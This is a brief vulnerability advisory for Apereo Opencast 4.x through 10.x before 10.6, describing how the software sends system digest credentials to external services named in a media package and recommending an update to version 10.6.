CVE-2018-16153

Name of the Vulnerable Software and Affected Versions Apereo Opencast versions 4.x through 10.x before 10.6

Description An issue was discovered in Apereo Opencast where it sends system digest credentials during authentication attempts to arbitrary external services in some situations. This occurs when Opencast tries to authenticate against any external services listed in a media package, sending the global system user's credentials, regardless of the target being part of the Opencast cluster or not. Although previous mitigations prevented clear text authentications for such requests, hashed credentials can still be broken with enough malicious intent.

Recommendations For Apereo Opencast versions 4.x through 10.x before 10.6, update to version 10.6, which now sends authentication requests only against servers that are part of the Opencast cluster, preventing external services from getting any form of authentication attempt. At the moment, there is no other information about additional mitigation measures for these versions.